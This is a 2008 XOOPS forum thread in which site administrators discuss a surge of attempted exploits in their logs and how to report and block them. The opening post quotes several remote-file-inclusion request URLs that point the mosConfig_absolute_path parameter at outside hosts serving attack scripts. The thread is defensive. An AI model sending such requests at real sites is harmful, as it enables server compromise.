xoops forums

peterr

Just can't stay away
Posted on: 2008/4/16 11:53
peterr
peterr (Show more)
Just can't stay away
Posts: 518
Since: 2004/8/5 9
#1

Increase in attempyed exploits

Just wondering if any other XOOPS users are noticing a significant increase in the number of exploits on their site ?

The type of activity that has increased is of this nature:

Quote:

www.example.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???

www.example.com/modules/xhld0//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/administrator/ ... ?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/ ... ?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???


I have checked the site at http://www.milw0rm.com/ , and searched for 'XOOPS', to see if there are any new vulnerabilities, but cannot see anything significant.

The number of attempted exploits has gone from about 3 or 4 a day to 90 or so, quite a rise.

Maybe it's just a case of more people with nothing better to do ??
NO to the Microsoft Office format as an ISO standard.
Sign the petition

Tobias

Not too shy to talk
Posted on: 2008/4/17 5:55
Tobias
Tobias (Show more)
Not too shy to talk
Posts: 172
Since: 2005/9/13
#2

Re: Increase in attempyed exploits

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the servers setup and try to get shell access.

Where are these log entries from, anyway? They look funky.

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills. You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.

*edit* But probably, you don't want to have to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use the Internet Explorer if you want to look around what's going on there.

Lloyd

Just popping in
Posted on: 2008/4/17 6:49
Lloyd
Lloyd (Show more)
Just popping in
Posts: 43
Since: 2006/7/4 1
#3

Re: Increase in attempyed exploits

Contact the IP block owners.....not the offending website owners.

nameserver11.net = 65.254.49.77
This IP block is owned by Global Net Access, LLC,
Address: 1100 White St SW
City: Atlanta
StateProv: GA
PostalCode: 30310
Country: US
NetRange: 65.254.32.0 - 65.254.63.255
contact: abuse @ gnax.net, send them as much if as you can.


tugzip.com = 194.150.222.75
Country:Sweden
NetRange: 194.150.222.0 - 194.150.223.255
contact: abuse @sajthotellet.com

peterr

Just can't stay away
Posted on: 2008/4/17 6:57
peterr
peterr (Show more)
Just can't stay away
Posts: 518
Since: 2004/8/5 9
#4

Re: Increase in attempted exploits

Quote:

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the servers setup and try to get shell access.


Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.

Fortunately, the server is configured to return a 403 on most of these, or a 404.

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new expoit, but as yet unknown to a lot of people. Found one at http://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.

Quote:

Where are these log entries from, anyway? They look funky.


Coming from many different IP addresses. Hmm, look funky, not too sure what you mean there ?? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.

Quote:

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.


In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automatted system would be better.

Quote:

You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.


The host I use has it all tied down fairly well, but the 403 messages have now changed to 404's, so I'll ask why the server change.

Quote:

*edit* But probably, you don't want to have to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use the Internet Explorer if you want to look around what's going on there.


Yes, I don't use IE, Firefox for me.
NO to the Microsoft Office format as an ISO standard.
Sign the petition

jobrazo

Just popping in
Posted on: 2008/4/17 10:53
jobrazo
jobrazo (Show more)
Just popping in
Posts: 46
Since: 2007/9/26
#5

Re: Increase in attempyed exploits

I also have a major increase of exploit attempts the past few weeks.
Targetted module is wiwimod, there looking for the spaweditor, witch is removed because of know exploits.

Tobias

Not too shy to talk
Posted on: 2008/4/17 16:54
Tobias
Tobias (Show more)
Not too shy to talk
Posts: 172
Since: 2005/9/13
#6

Re: Increase in attempyed exploits

Quote:

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new expoit, but as yet unknown to a lot of people. Found one at http://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.

My XOOPS installation has exactly one database.php which sits at class/database. If your attackers try to find a database.php all over the place, then that's probably just a crapshot. Perhaps some modules also have a database.php.

In any case, if there's a pattern and you want to make sure, you can probably just block all requests containing the string database.php in your htaccess file. I can't imagine any reason why a script by that name should be legitimately called from the outside.


Quote:

Yes, I don't use IE, Firefox for me.


Just saying because that tugzip site is hacked and may serve up malware. At the time of writing this, perhaps they clean it up soon.

peterr

Just can't stay away
Posted on: 2008/4/24 0:36
peterr
peterr (Show more)
Just can't stay away
Posts: 518
Since: 2004/8/5 9
#7

Re: Increase in attempted exploits

There is one pattern of a lot of exploits, and it is this as part of the uri

Quote:

.....mosConfig_absolute_path=.....


Apparently, that is related to Mambo exploits, so I did a google search on the site, and looked for 'mambo' , and sure enough, there is one page that has Mambo described in it.

So, no doubt the huge increase in exploits is because the attempted exploiters think the website is running Mambo.

I'll remove that page, and then see if there is a decrease; it may take several weeks before the Google cache is updated of course.
NO to the Microsoft Office format as an ISO standard.
Sign the petition

Tobias

Not too shy to talk
Posted on: 2008/4/24 6:01
Tobias
Tobias (Show more)
Not too shy to talk
Posts: 172
Since: 2005/9/13
#8

Re: Increase in attempyed exploits

Quote:
Just saying because that tugzip site is hacked and may serve up malware. At the time of writing this, perhaps they clean it up soon.

It's cleaned up, just for the record.